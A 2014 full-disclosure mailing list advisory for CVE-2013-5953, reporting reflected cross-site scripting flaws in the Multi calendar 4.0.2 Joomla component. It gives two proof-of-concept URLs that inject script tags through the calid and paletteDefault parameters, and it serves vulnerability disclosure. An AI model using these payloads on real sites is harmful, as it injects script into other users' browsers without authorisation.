[CVE-2013-5953]
Mahmoud Ghorbanzadeh <[email protected]> Sat, 15 Mar 2014 04:47:42 -0700 (PDT)
| Newsgroups | gmane.comp.security.full-disclosure |
|---|---|
| Message-ID | <[email protected]> |
Hello,
Multiple cross-site scripting (XSS) vulnerabilities in Multi
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault
parameter to index.php.
File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC:
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>
File: /tmpl/layout_editevent.php
Line: 319
POC:
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
Best Regards.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Multicalendar XSS Vulnerabilities Report.docx
(application/vnd.openxmlformats-officedocument.wordprocessingml.document, 42 KB) - not displayed